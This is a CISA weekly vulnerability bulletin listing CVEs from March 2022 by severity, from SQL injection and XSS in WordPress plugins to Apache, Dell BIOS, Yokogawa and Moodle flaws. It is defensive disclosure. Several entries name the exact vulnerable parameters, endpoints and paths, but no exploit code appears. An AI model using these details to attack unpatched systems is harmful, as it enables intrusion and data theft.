Vulnerability Summary for the Week of March 14, 2022

Released
Mar 21, 2022
Document ID
SB22-080

The CISA Vulnerability Bulletin provides a summary of new vulnerabilities that have been recorded in the past week. In some cases, the vulnerabilities in the bulletin may not yet have assigned CVSS scores.

Vulnerabilities are based on the Common Vulnerabilities and Exposures (CVE) vulnerability naming standard and are organized according to severity, determined by the Common Vulnerability Scoring System (CVSS) standard. The division of high, medium, and low severities correspond to the following scores:

  • High: vulnerabilities with a CVSS base score of 7.0–10.0
  • Medium: vulnerabilities with a CVSS base score of 4.0–6.9
  • Low: vulnerabilities with a CVSS base score of 0.0–3.9

Entries may include additional information provided by organizations and efforts sponsored by CISA. This information may include identifying information, values, definitions, and related links. Patch information is provided when available. Please note that some of the information in the bulletin is compiled from external, open-source reports and is not a direct result of CISA analysis. 


 

High Vulnerabilities

Primary
Vendor -- Product
DescriptionPublishedCVSS ScoreSource & Patch Info
10web -- photo_galleryThe Photo Gallery by 10Web WordPress plugin before 1.6.0 does not validate and escape the bwg_tag_id_bwg_thumbnails_0 parameter before using it in a SQL statement via the bwg_frontend_data AJAX action (available to unauthenticated and authenticated users), leading to an unauthenticated SQL injection2022-03-147.5CVE-2022-0169
MISC
CONFIRM
adobe -- illustratorAdobe Illustrator version 26.0.3 (and earlier) is affected by a buffer overflow vulnerability due to insecure handling of a crafted file, potentially resulting in arbitrary code execution in the context of the current user. Exploitation requires user interaction in that a victim must open a crafted file in Illustrator.2022-03-119.3CVE-2022-23187
MISC
apache -- http_serverOut-of-bounds Write vulnerability in mod_sed of Apache HTTP Server allows an attacker to overwrite heap memory with possibly attacker provided data. This issue affects Apache HTTP Server 2.4 version 2.4.52 and prior versions.2022-03-147.5CVE-2022-23943
MISC
MLIST
apache -- http_serverApache HTTP Server 2.4.52 and earlier fails to close inbound connection when errors are encountered discarding the request body, exposing the server to HTTP Request Smuggling2022-03-147.5CVE-2022-22720
MISC
MLIST
bluproducts -- g90_firmwareAn issue was discovered in Luna Simo PPR1.180610.011/202001031830. A pre-installed app with a package name of com.skyroam.silverhelper writes three IMEI values to system properties at system startup. The system property values can be obtained via getprop by all third-party applications co-located on the device, even those with no permissions granted, exposing the IMEI values to processes without enforcing any access control.2022-03-117.2CVE-2021-41850
MISC
MISC
MISC
MISC
dell -- alienware_13_r3_firmwareDell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution during SMM.2022-03-117.2CVE-2022-24420
MISC
dell -- alienware_13_r3_firmwareDell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution during SMM.2022-03-117.2CVE-2022-24419
MISC
dell -- alienware_13_r3_firmwareDell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution during SMM.2022-03-117.2CVE-2022-24416
MISC
dell -- alienware_13_r3_firmwareDell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution during SMM.2022-03-117.2CVE-2022-24415
MISC
dell -- alienware_13_r3_firmwareDell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution during SMM.2022-03-117.2CVE-2022-24421
MISC
lg -- webosThe public API error causes for the attacker to be able to bypass API access control.2022-03-117.5CVE-2022-23730
MISC
molie_instructure_canvas_linking_tool_project -- molie_instructure_canvas_linking_toolThe MOLIE WordPress plugin through 0.5 does not validate and escape a post parameter before using in a SQL statement, leading to an SQL Injection2022-03-147.5CVE-2021-25007
MISC
nystudio107 -- seomaticA Server-side Template Injection (SSTI) vulnerability exists in Nystudio107 Seomatic 3.4.12 in src/helpers/UrlHelper.php via the host header.2022-03-117.5CVE-2021-44618
MISC
MISC
parseplatform -- parse-serverParse Server is an open source http web server backend. In versions prior to 4.10.7 there is a Remote Code Execution (RCE) vulnerability in Parse Server. This vulnerability affects Parse Server in the default configuration with MongoDB. The main weakness that leads to RCE is the Prototype Pollution vulnerable code in the file `DatabaseController.js`, so it is likely to affect Postgres and any other database backend as well. This vulnerability has been confirmed on Linux (Ubuntu) and Windows. Users are advised to upgrade as soon as possible. The only known workaround is to manually patch your installation with code referenced at the source GHSA-p6h4-93qp-jhcm.2022-03-127.5CVE-2022-24760
CONFIRM
MISC
ponton -- x\/p_messengerAn issue was discovered in PONTON X/P Messenger before 3.11.2. Due to path traversal in private/SchemaSetUpload.do for uploaded ZIP files, an executable script can be uploaded by web application administrators, giving the attacker remote code execution on the underlying server via an imgs/*.jsp URI.2022-03-137.5CVE-2021-45887
MISC
MISC
simple-git_project -- simple-gitThe package simple-git before 3.3.0 are vulnerable to Command Injection via argument injection. When calling the .fetch(remote, branch, handlerFn) function, both the remote and branch parameters are passed to the git fetch subcommand. By injecting some git options it was possible to get arbitrary command execution.2022-03-117.5CVE-2022-24433
MISC
MISC
MISC
MISC
totolink -- a3100r_firmwareA Command Injection vulnerability exits in TOTOLINK A3100R <=V4.1.2cu.5050_B20200504 in adm/ntm.asp via the hosTime parameters.2022-03-117.5CVE-2021-44620
MISC
MISC
MISC
MISC
tribalsystems -- zenarioZenario CMS 9.0.54156 is vulnerable to File Upload. The web server can be compromised by uploading and executing a web-shell which can run commands, browse system files, browse local resources, attack other servers, and exploit the local vulnerabilities, and so forth.2022-03-147.5CVE-2021-42171
MISC
wptaskforce -- wpcargo_track_\&_traceThe WPCargo Track & Trace WordPress plugin before 6.9.0 contains a file which could allow unauthenticated attackers to write a PHP file anywhere on the web server, leading to RCE2022-03-147.5CVE-2021-25003
MISC
yokogawa -- centum_vp_firmwareThe following Yokogawa Electric products hard-code the password for CAMS server applications: CENTUM VP versions from R5.01.00 to R5.04.20 and versions from R6.01.00 to R6.08.00, Exaopc versions from R3.72.00 to R3.79.002022-03-117.5CVE-2022-23402
CONFIRM

Back to top

 

Medium Vulnerabilities

Primary
Vendor -- Product
DescriptionPublishedCVSS ScoreSource & Patch Info
abb -- ellipse_enterprise_asset_managementAn attacker could trick a user of Hitachi ABB Power Grids Ellipse Enterprise Asset Management (EAM) versions prior to and including 9.0.25 into visiting a malicious website posing as a login page for the Ellipse application and gather authentication credentials.2022-03-114.3CVE-2021-27414
CONFIRM
CONFIRM
abb -- ellipse_enterprise_asset_managementAn attacker could exploit this vulnerability in Hitachi ABB Power Grids Ellipse Enterprise Asset Management (EAM) versions prior to and including 9.0.25 by tricking a user to click on a link containing malicious code that would then be run by the web browser. This can result in the compromise of confidential information, or even the takeover of the user’s session.2022-03-115.8CVE-2021-27416
CONFIRM
CONFIRM
alibaba -- nacosA Cross Site Scripting (XSS) vulnerability exists in Nacos 2.0.3 in auth/users via the (1) pageSize and (2) pageNo parameters.2022-03-114.3CVE-2021-44667
MISC
alist_project -- alistAlist v2.1.0 and below was discovered to contain a cross-site scripting (XSS) vulnerability via /i/:data/ipa.plist.2022-03-124.3CVE-2022-26533
MISC
apache -- http_serverA carefully crafted request body can cause a read to a random memory area which could cause the process to crash. This issue affects Apache HTTP Server 2.4.52 and earlier.2022-03-145CVE-2022-22719
MISC
MLIST
apache -- http_serverIf LimitXMLRequestBody is set to allow request bodies larger than 350MB (defaults to 1M) on 32 bit systems an integer overflow happens which later causes out of bounds writes. This issue affects Apache HTTP Server 2.4.52 and earlier.2022-03-146.8CVE-2022-22721
MISC
MLIST
atlassian -- crucibleThe DefaultRepositoryAdminService class in Fisheye and Crucible before version 4.8.9 allowed remote attackers, who have 'can add repository permission', to enumerate the existence of internal network and filesystem resources via a Server-Side Request Forgery (SSRF) vulnerability.2022-03-144CVE-2021-43954
MISC
MISC
bestwebsoft -- error_log_viewerThe Error Log Viewer WordPress plugin through 1.1.1 does not validate the path of the log file to clear, allowing high privilege users to clear arbitrary files on the web server, including those outside of the blog folder2022-03-144CVE-2021-24966
MISC
bwp-google-xml-sitemaps_project -- bwp-google-xml-sitemapsThe Better WordPress Google XML Sitemaps WordPress plugin through 1.4.1 does not sanitise and escape its logs when outputting them in the admin dashboard, which could allow unauthenticated users to perform Stored Cross-Site Scripting attacks against admins2022-03-144.3CVE-2022-0230
MISC
contact-form-submission_project -- contact-form-submissionThe Contact Form Submissions WordPress plugin before 1.7.3 does not sanitise and escape additional fields in contact form requests before outputting them in the related submission. As a result, unauthenticated attacker could perform Cross-Site Scripting attacks against admins viewing the malicious submission2022-03-144.3CVE-2022-0248
MISC
CONFIRM
cookieinformation -- wp-gdpr-complianceThe Cookie Information | Free GDPR Consent Solution WordPress plugin before 2.0.8 does not escape user data before outputting it back in attributes in the admin dashboard, leading to a Reflected Cross-Site Scripting issue2022-03-144.3CVE-2022-0147
MISC
CONFIRM
fasterxml -- jackson-databindjackson-databind before 2.13.0 allows a Java StackOverflow exception and denial of service via a large depth of nested objects.2022-03-115CVE-2020-36518
MISC
gpac -- gpacGPAC 1.0.1 is affected by a NULL pointer dereference in gf_dump_vrml_field.isra ().2022-03-144.3CVE-2022-24574
MISC
gpac -- gpacGPAC 2.0 allows a heap-based buffer overflow in gf_base64_encode. It can be triggered via MP4Box.2022-03-126.8CVE-2022-26967
MISC
gpac -- gpacGPAC 1.0.1 is affected by a stack-based buffer overflow through MP4Box.2022-03-146.8CVE-2022-24575
MISC
MISC
gpac -- gpacGPAC 1.0.1 is affected by Use After Free through MP4Box.2022-03-144.3CVE-2022-24576
MISC
MISC
huawei -- atuneatune before 0.3-0.8 log in as a local user and run the curl command to access the local atune url interface to escalate the local privilege or modify any file. Authentication is not forcibly enabled in the default configuration.2022-03-114.6CVE-2021-33658
CONFIRM
intel -- atom_c2308Hardware allows activation of test or debug logic at runtime for some Intel(R) Trace Hub instances which may allow an unauthenticated user to potentially enable escalation of privilege via physical access.2022-03-114.6CVE-2021-33150
MISC
king-theme -- kingcomposerThe Page Builder KingComposer WordPress plugin through 2.9.6 does not validate the id parameter before redirecting the user to it via the kc_get_thumbn AJAX action available to both unauthenticated and authenticated users2022-03-146.8CVE-2022-0165
MISC
lg -- webosV8 javascript engine (heap vulnerability) can cause privilege escalation ,which can impact on some webOS TV models.2022-03-114.6CVE-2022-23731
MISC
liblouis -- liblouisLiblouis through 3.21.0 has a buffer overflow in compilePassOpcode in compileTranslationTable.c (called, indirectly, by tools/lou_checktable.c).2022-03-136.8CVE-2022-26981
MISC
libtiff -- libtiffOut-of-bounds Read error in tiffcp in libtiff 4.3.0 allows attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit 408976c4.2022-03-114.3CVE-2022-0924
MISC
CONFIRM
MISC
libtiff -- libtiffNull source pointer passed as an argument to memcpy() function within TIFFFetchNormalTag () in tif_dirread.c in libtiff versions up to 4.3.0 could lead to Denial of Service via crafted TIFF file.2022-03-114.3CVE-2022-0908
CONFIRM
MISC
MISC
libtiff -- libtiffUnchecked Return Value to NULL Pointer Dereference in tiffcrop in libtiff 4.3.0 allows attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit f2b656e2.2022-03-114.3CVE-2022-0907
MISC
CONFIRM
MISC
libtiff -- libtiffDivide By Zero error in tiffcrop in libtiff 4.3.0 allows attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit f8d0f9aa.2022-03-114.3CVE-2022-0909
MISC
MISC
CONFIRM
lua -- luaUse after free in garbage collector and finalizer of lgc.c in Lua interpreter 5.4.0~5.4.3 allows attackers to perform Sandbox Escape via a crafted script file.2022-03-144.3CVE-2021-44964
MISC
MISC
MISC
MISC
MISC
microweber -- microweberAbusing Backup/Restore feature to achieve Remote Code Execution in GitHub repository microweber/microweber prior to 1.2.12.2022-03-116.5CVE-2022-0921
MISC
CONFIRM
microweber -- microweberInteger Overflow or Wraparound in GitHub repository microweber/microweber prior to 1.3.2022-03-115CVE-2022-0913
CONFIRM
MISC
microweber -- microweberXSS on dynamic_text module in GitHub repository microweber/microweber prior to 1.2.11.2022-03-124.3CVE-2022-0929
MISC
CONFIRM
mirametrix -- glanceMirametrix Glance before 5.1.1.42207 (released on 2018-08-30) allows a local attacker to elevate privileges. NOTE: this is unrelated to products from the glance.com and glance.net websites.2022-03-134.6CVE-2022-24696
MISC
molie_instructure_canvas_linking_tool_project -- molie_instructure_canvas_linking_toolThe MOLIE WordPress plugin through 0.5 does not escape the course_id parameter before outputting it back in the admin dashboard, leading to a Reflected Cross-Site Scripting issue2022-03-144.3CVE-2021-25006
MISC
moodle -- moodleThe last time a user accessed the mobile app is displayed on their profile page, but should be restricted to users with the relevant capability (site administrators by default). Moodle versions 3.10 to 3.10.3 are affected.2022-03-114CVE-2021-32477
MISC
moodle -- moodleThe redirect URI in the LTI authorization endpoint required extra sanitizing to prevent reflected XSS and open redirect risks. Moodle versions 3.10 to 3.10.3, 3.9 to 3.9.6, 3.8 to 3.8.8 and earlier unsupported versions are affected.2022-03-114.3CVE-2021-32478
MISC
moodle -- moodleAn SQL injection risk existed on sites with MNet enabled and configured, via an XML-RPC call from the connected peer host. Note that this required site administrator access or access to the keypair. Moodle 3.10 to 3.10.3, 3.9 to 3.9.6, 3.8 to 3.8.8, 3.5 to 3.5.17 and earlier unsupported versions are affected.2022-03-116.5CVE-2021-32474
MISC
moodle -- moodleA denial-of-service risk was identified in the draft files area, due to it not respecting user file upload limits. Moodle versions 3.10 to 3.10.3, 3.9 to 3.9.6, 3.8 to 3.8.8, 3.5 to 3.5.17 and earlier unsupported versions are affected.2022-03-115CVE-2021-32476
MISC
moodle -- moodleIt was possible for a student to view their quiz grade before it had been released, using a quiz web service. Moodle 3.10 to 3.10.3, 3.9 to 3.9.6, 3.8 to 3.8.8, 3.5 to 3.5.17 and earlier unsupported versions are affected2022-03-115CVE-2021-32473
MISC
onenav_project -- onenavAn issue in index.php of OneNav v0.9.14 allows attackers to perform directory traversal.2022-03-125CVE-2022-26276
MISC
oppo -- colorosIn ACE2 ColorOS11, the attacker can obtain the foreground package name through permission promotion, resulting in user information disclosure.2022-03-115CVE-2021-23246
MISC
orchardcore -- orchardcoreCross-site Scripting (XSS) - Stored in GitHub repository orchardcms/orchardcore prior to 1.3.0.2022-03-114.3CVE-2022-0820
CONFIRM
MISC
orchardcore -- orchardcoreImproper Authorization in GitHub repository orchardcms/orchardcore prior to 1.3.0.2022-03-114CVE-2022-0821
CONFIRM
MISC
phpliteadmin -- phpliteadminphpLiteAdmin through 1.9.8.2 allows XSS via the index.php newRows parameter (aka num or number).2022-03-134.3CVE-2021-46709
MISC
ponton -- x\/p_messengerAn issue was discovered in PONTON X/P Messenger before 3.11.2. Anti-CSRF tokens are globally valid, making the web application vulnerable to a weakened version of CSRF, where an arbitrary token of a low-privileged user (such as operator) can be used to confirm actions of higher-privileged ones (such as xpadmin).2022-03-136.8CVE-2021-45886
MISC
MISC
redhat -- descision_managerA flaw was found in JBoss-client. The vulnerability occurs due to a memory leak on the JBoss client-side, when using UserTransaction repeatedly and leads to information leakage vulnerability.2022-03-115CVE-2022-0853
MISC
MISC
saleor -- saleorImproper Authorization in GitHub repository saleor/saleor prior to 3.1.2.2022-03-114CVE-2022-0932
CONFIRM
MISC
secomea -- gatemanagerCross-site Scripting (XSS) vulnerability in firmware section of Secomea GateManager allows logged in user to inject javascript in browser session. This issue affects: Secomea GateManager Version 9.6.621421014 and all prior versions.2022-03-114.3CVE-2021-32009
MISC
smartertools -- smartertrackCross-site Scripting (XSS) vulnerability in SmarterTools SmarterTrack This issue affects: SmarterTools SmarterTrack 100.0.8019.14010.2022-03-144.3CVE-2022-24384
CONFIRM
CONFIRM
smartertools -- smartertrackA Direct Object Access vulnerability in SmarterTools SmarterTrack leads to information disclosure This issue affects: SmarterTools SmarterTrack 100.0.8019.14010.2022-03-144CVE-2022-24385
CONFIRM
CONFIRM
smartertools -- smartertrackWith administrator or admin privileges the application can be tricked into overwriting files in app_data/Config folder, e.g. the systemsettings.xml file. THis is possible in SmarterTrack v100.0.8019.140102022-03-146.5CVE-2022-24387
CONFIRM
CONFIRM
softing -- datafeed_opc_suiteAn issue was discovered in Softing OPC UA C++ SDK before 5.70. An invalid XML element in the type dictionary makes the OPC/UA client crash due to an out-of-memory condition.2022-03-114CVE-2021-42262
MISC
MISC
softing -- datafeed_opc_suiteAn issue was discovered in Softing OPC UA C++ SDK before 5.70. A malformed OPC/UA message abort packet makes the client crash with a NULL pointer dereference.2022-03-115CVE-2021-42577
MISC
MISC
techspawn -- wp-email-usersThe WP Email Users WordPress plugin through 1.7.6 does not escape the data_raw parameter in the weu_selected_users_1 AJAX action, available to any authenticated users, allowing them to perform SQL injection attacks.2022-03-146.5CVE-2021-24959
MISC
timescale -- timescaledbTimescale TimescaleDB 1.x and 2.x before 2.5.2 may allow privilege escalation during extension installation. The installation process uses commands such as CREATE x IF NOT EXIST that allow an unprivileged user to precreate objects. These objects will be used by the installer (which executes as Superuser), leading to privilege escalation. In order to be able to take advantage of this, an unprivileged user would need to be able to create objects in a database and then get a Superuser to install TimescaleDB into their database. (In the fixed versions, the installation aborts when it finds that an object already exists.)2022-03-136CVE-2022-24128
MISC
CONFIRM
tipsandtricks-hq -- simple_download_monitorThe Simple Download Monitor WordPress plugin before 3.9.5 allows users with a role as low as Contributor to download any file on the web server (such as wp-config.php) via a path traversal vector.2022-03-144CVE-2021-24692
MISC
wire -- wireWire-ios is a messaging application using the wire protocol on apple's ios platform. In versions prior to 3.95 malformed resource identifiers may render the iOS Wire Client completely unusable by causing it to repeatedly crash on launch. These malformed resource identifiers can be generated and sent between Wire users. The root cause lies in [wireapp/wire-ios-transport](https://github.com/wireapp/wire-ios-transport), where code responsible for removing sensible tokens before logging may fail and lead to a crash (Swift exception) of the application. This causes undesirable behavior, however the (greater) Wire system is still functional. Users are advised to upgrade as soon as possible. There are no known workarounds for this issue.2022-03-114CVE-2022-23625
MISC
MISC
CONFIRM
wki -- idpay_for_contact_form_7The IDPay for Contact Form 7 WordPress plugin through 2.1.2 does not sanitise and escape the idpay_error parameter before outputting it back in the page leading to a Reflected Cross-Site Scripting2022-03-144.3CVE-2021-24996
MISC
woocommerce -- persian-woocommerceThe Persian Woocommerce WordPress plugin through 5.8.0 does not escape the s parameter before outputting it back in an attribute in the admin dashboard, which could lead to a Reflected Cross-Site Scripting issue2022-03-144.3CVE-2021-24940
MISC
yokogawa -- centum_cs_3000_firmware'Root Service' service implemented in the following Yokogawa Electric products creates some named pipe with improper ACL configuration. CENTUM CS 3000 versions from R3.08.10 to R3.09.00, CENTUM VP versions from R4.01.00 to R4.03.00, from R5.01.00 to R5.04.20, and from R6.01.00 to R6.08.00, Exaopc versions from R3.72.00 to R3.79.00.2022-03-116.9CVE-2022-22148
CONFIRM
yokogawa -- centum_cs_3000_firmwareCAMS for HIS Log Server contained in the following Yokogawa Electric products fails to properly neutralize log outputs: CENTUM CS 3000 versions from R3.08.10 to R3.09.00, CENTUM VP versions from R4.01.00 to R4.03.00, from R5.01.00 to R5.04.20, and from R6.01.00 to R6.08.00, and Exaopc versions from R3.72.00 to R3.79.00.2022-03-114.9CVE-2022-22151
CONFIRM
yokogawa -- centum_cs_3000_firmwareCAMS for HIS Log Server contained in the following Yokogawa Electric products is vulnerable to uncontrolled resource consumption. CENTUM CS 3000 versions from R3.08.10 to R3.09.00, CENTUM VP versions from R4.01.00 to R4.03.00, from R5.01.00 to R5.04.20, from R6.01.00 to R6.08.00, Exaopc versions from R3.72.00 to R3.79.00.2022-03-114.9CVE-2022-22145
CONFIRM
yokogawa -- centum_cs_3000_firmwareThere is a path traversal vulnerability in CAMS for HIS Log Server contained in the following Yokogawa Electric products: CENTUM CS 3000 versions from R3.08.10 to R3.09.00, CENTUM VP versions from R4.01.00 to R4.03.00, from R5.01.00 to R5.04.20, andfrom R6.01.00 to R6.08.00, Exaopc versions from R3.72.00 to R3.79.00.2022-03-114.9CVE-2022-21177
CONFIRM
yokogawa -- centum_cs_3000_firmwareCAMS for HIS Server contained in the following Yokogawa Electric products improperly authenticate the receiving packets. The authentication may be bypassed via some crafted packets: CENTUM CS 3000 versions from R3.08.10 to R3.09.00, CENTUM VP versions from R4.01.00 to R4.03.00, from R5.01.00 to R5.04.20, and from R6.01.00 to R6.08.00, and Exaopc versions from R3.72.00 to R3.79.00.2022-03-116CVE-2022-22729
CONFIRM
yokogawa -- centum_cs_3000_firmwarePath traversal vulnerability exists in CAMS for HIS Server contained in the following Yokogawa Electric products: CENTUM CS 3000 versions from R3.08.10 to R3.09.00, CENTUM VP versions from R4.01.00 to R4.03.00, from R5.01.00 to R5.04.20, and from R6.01.00 to R6.08.00, Exaopc versions from R3.72.00 to R3.79.00.2022-03-116CVE-2022-21808
CONFIRM
yokogawa -- centum_cs_3000_firmware'Long-term Data Archive Package' service implemented in the following Yokogawa Electric products creates some named pipe with imporper ACL configuration. CENTUM CS 3000 versions from R3.08.10 to R3.09.00, CENTUM VP versions from R4.01.00 to R4.03.00, from R5.01.00 to R5.04.20, and from R6.01.00 to R6.08.00, Exaopc versions from R3.72.00 to R3.79.00.2022-03-114.4CVE-2022-22141
CONFIRM
yokogawa -- centum_vp_firmwareThe following Yokogawa Electric products do not change the passwords of the internal Windows accounts from the initial configuration: CENTUM VP versions from R5.01.00 to R5.04.20 and versions from R6.01.00 to R6.08.0, Exaopc versions from R3.72.00 to R3.79.00.2022-03-116.8CVE-2022-21194
CONFIRM

Back to top

 

Low Vulnerabilities

Primary
Vendor -- Product
DescriptionPublishedCVSS ScoreSource & Patch Info
amd -- athlon_x4_940_firmwareSome AMD CPUs may transiently execute beyond unconditional direct branches, which may potentially result in data leakage.2022-03-112.1CVE-2021-26341
MISC
MLIST
amd -- athlon_x4_940_firmwareLFENCE/JMP (mitigation V2-2) may not sufficiently mitigate CVE-2017-5715 on some AMD CPUs.2022-03-111.9CVE-2021-26401
MISC
MLIST
b3log -- vditorCross-site Scripting (XSS) - Stored in GitHub repository vanessa219/vditor prior to 3.8.12.2022-03-143.5CVE-2022-0341
CONFIRM
MISC
bluproducts -- g90_firmwareAn issue was discovered in Luna Simo PPR1.180610.011/202001031830. It sends the following Personally Identifiable Information (PII) in plaintext using HTTP to servers located in China: user's list of installed apps and device International Mobile Equipment Identity (IMEI). This PII is transmitted to log.skyroam.com.cn using HTTP, independent of whether the user uses the Simo software.2022-03-112.1CVE-2021-41849
MISC
MISC
MISC
MISC
childtheme-generator -- child_theme_generatorThe Child Theme Generator WordPress plugin through 2.2.7 does not sanitise escape the parade parameter before outputting it back, leading to a Reflected Cross-Site Scripting in the admin dashboard2022-03-143.5CVE-2021-24982
MISC
html5_responsive_faq_project -- html5_responsive_faqThe HTML5 Responsive FAQ WordPress plugin through 2.8.5 does not properly sanitise and escape some of its settings, which could allow a high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html is disallowed2022-03-143.5CVE-2021-24995
MISC
intel -- atom_c3308Non-transparent sharing of branch predictor within a context in some Intel(R) Processors may allow an authorized user to potentially enable information disclosure via local access.2022-03-112.1CVE-2022-0002
MISC
MLIST
intel -- atom_p5921bNon-transparent sharing of branch predictor selectors between contexts in some Intel(R) Processors may allow an authorized user to potentially enable information disclosure via local access.2022-03-112.1CVE-2022-0001
MISC
MLIST
linux -- linux_kernelAn issue was discovered in the Linux kernel before 5.16.12. drivers/net/usb/sr9700.c allows attackers to obtain sensitive information from heap memory via crafted frame lengths from a device.2022-03-122.1CVE-2022-26966
MISC
MISC
microweber -- microweberFile upload filter bypass leading to stored XSS in GitHub repository microweber/microweber prior to 1.2.12.2022-03-123.5CVE-2022-0930
MISC
CONFIRM
microweber -- microweberUnrestricted Upload of File with Dangerous Type in GitHub repository microweber/microweber prior to 1.2.11.2022-03-113.5CVE-2022-0912
MISC
CONFIRM
microweber -- microweberFile upload filter bypass leading to stored XSS in GitHub repository microweber/microweber prior to 1.2.12.2022-03-123.5CVE-2022-0926
MISC
CONFIRM
moodle -- moodleID numbers displayed in the quiz grading report required additional sanitizing to prevent a stored XSS risk. Moodle 3.10 to 3.10.3, 3.9 to 3.9.6, 3.8 to 3.8.8, 3.5 to 3.5.17 and earlier unsupported versions are affected.2022-03-113.5CVE-2021-32475
MISC
moodle -- moodleTeachers exporting a forum in CSV format could receive a CSV of forums from all courses in some circumstances. Moodle versions 3.10 to 3.10.3, 3.9 to 3.9.6 and 3.8 to 3.8.8 are affected.2022-03-112.6CVE-2021-32472
MISC
openbsd -- openssh** DISPUTED ** An issue was discovered in OpenSSH before 8.9. If a client is using public-key authentication with agent forwarding but without -oLogLevel=verbose, and an attacker has silently modified the server to support the None authentication option, then the user cannot determine whether FIDO authentication is going to confirm that the user wishes to connect to that server, or that the user wishes to allow that server to connect to a different server on the user's behalf. NOTE: the vendor's position is "this is not an authentication bypass, since nothing is being bypassed."2022-03-132.6CVE-2021-36368
MISC
MISC
CONFIRM
MISC
orchardcore -- orchardcoreCross-site Scripting (XSS) - Reflected in GitHub repository orchardcms/orchardcore prior to 1.3.0.2022-03-113.5CVE-2022-0822
CONFIRM
MISC
patreon -- patreon_wordpressThe Patreon WordPress plugin before 1.8.2 does not sanitise and escape the field "Custom Patreon Page name", which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed2022-03-143.5CVE-2021-25026
MISC
CONFIRM
ponton -- x\/p_messengerAn issue was discovered in PONTON X/P Messenger before 3.11.2. Several functions are vulnerable to reflected XSS, as demonstrated by private/index.jsp?partners/ShowNonLocalPartners.do?localID= or private/index.jsp or private/index.jsp?database/databaseTab.jsp or private/index.jsp?activation/activationMainTab.jsp or private/index.jsp?communication/serverTab.jsp or private/index.jsp?emailNotification/notificationTab.jsp.2022-03-133.5CVE-2021-45889
MISC
MISC
ponton -- x\/p_messengerAn issue was discovered in PONTON X/P Messenger before 3.11.2. The navigation tree that is shown on the left side of every page of the web application is vulnerable to XSS: it allows injection of JavaScript into its nodes. Creating such nodes is only possible for users who have the role Configuration Administrator or Administrator.2022-03-133.5CVE-2021-45888
MISC
MISC
showdoc -- showdocCross-site Scripting (XSS) - Stored in GitHub repository star7th/showdoc prior to 2.10.2.2022-03-123.5CVE-2022-0880
MISC
CONFIRM
showdoc -- showdocStored XSS viva cshtm file upload in GitHub repository star7th/showdoc prior to v2.10.4.2022-03-143.5CVE-2022-0946
CONFIRM
MISC
showdoc -- showdocStored XSS due to Unrestricted File Upload in GitHub repository star7th/showdoc prior to v2.10.4.2022-03-143.5CVE-2022-0941
CONFIRM
MISC
showdoc -- showdocStored XSS due to Unrestricted File Upload in GitHub repository star7th/showdoc prior to v2.10.4.2022-03-143.5CVE-2022-0940
MISC
CONFIRM
showdoc -- showdocStored XSS via file upload in GitHub repository star7th/showdoc prior to v2.10.4.2022-03-143.5CVE-2022-0938
CONFIRM
MISC
showdoc -- showdocStored xss in showdoc through file upload in GitHub repository star7th/showdoc prior to 2.10.4.2022-03-143.5CVE-2022-0937
MISC
CONFIRM
smartertools -- smartertrackStored XSS in SmarterTools SmarterTrack This issue affects: SmarterTools SmarterTrack 100.0.8019.14010.2022-03-143.5CVE-2022-24386
CONFIRM
CONFIRM
thememove -- insight_coreThe Insight Core WordPress plugin through 1.0 does not have any authorisation and CSRF checks in the insight_customizer_options_import (available to any authenticated user), does not validate user input before passing it to unserialize(), nor sanitise and escape it before outputting it in the response. As a result, it could allow users with a role as low as Subscriber to perform PHP Object Injection, as well as Stored Cross-Site Scripting attacks2022-03-143.5CVE-2021-24950
MISC
tribalsystems -- zenarioZenario CMS 9.0.54156 is vulnerable to Cross Site Scripting (XSS) via upload file to *.SVG. An attacker can send malicious files to victims and steals victim's cookie leads to account takeover. The person viewing the image of a contact can be victim of XSS.2022-03-143.5CVE-2021-41952
MISC
viitorcloud -- add_subtitleThe Add Subtitle WordPress plugin through 1.1.0 does not sanitise or escape the sub-title field (available only with classic editor) when output in the page, which could allow users with a role as low as contributor to perform Cross-Site Scripting attacks2022-03-143.5CVE-2021-24897
MISC
webbigt -- cybersoldierThe Cybersoldier WordPress plugin before 1.7.0 does not sanitise and escape the URL settings before outputting it in an attribute, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed2022-03-143.5CVE-2021-24895
MISC
yokogawa -- centum_cs_3000_firmwareThe following Yokogawa Electric products contain insecure DLL loading issues. CENTUM CS 3000 versions from R3.08.10 to R3.09.00, CENTUM VP versions from R4.01.00 to R4.03.00, from R5.01.00 to R5.04.20, and from R6.01.00 to R6.08.00, Exaopc versions from R3.72.00 to R3.79.00.2022-03-113.7CVE-2022-23401
CONFIRM

Back to top

 

Severity Not Yet Assigned

Primary
Vendor -- Product
DescriptionPublishedCVSS ScoreSource & Patch Info
389_directory_server -- 389_directory_server
 
A vulnerability was discovered in the 389 Directory Server that allows an unauthenticated attacker with network access to the LDAP port to cause a denial of service. The denial of service is triggered by a single message sent over a TCP connection, no bind or other authentication is required. The message triggers a segmentation fault that results in slapd crashing.2022-03-16not yet calculatedCVE-2022-0918
MISC
MISC
accelerated_mobile_pages -- accelerated_mobile_pagesAuthenticated (admin or higher user role) Stored Cross-Site Scripting (XSS) vulnerability discovered in AMP for WP – Accelerated Mobile Pages WordPress plugin (versions <= 1.0.77.31).2022-03-18not yet calculatedCVE-2021-23150
CONFIRM
CONFIRM
accelerated_mobile_pages -- accelerated_mobile_pagesMultiple Authenticated (admin user role) Persistent Cross-Site Scripting (XSS) vulnerabilities discovered in AMP for WP – Accelerated Mobile Pages WordPress plugin (versions <= 1.0.77.32).2022-03-18not yet calculatedCVE-2021-23209
CONFIRM
CONFIRM
accesslog -- accesslog
 
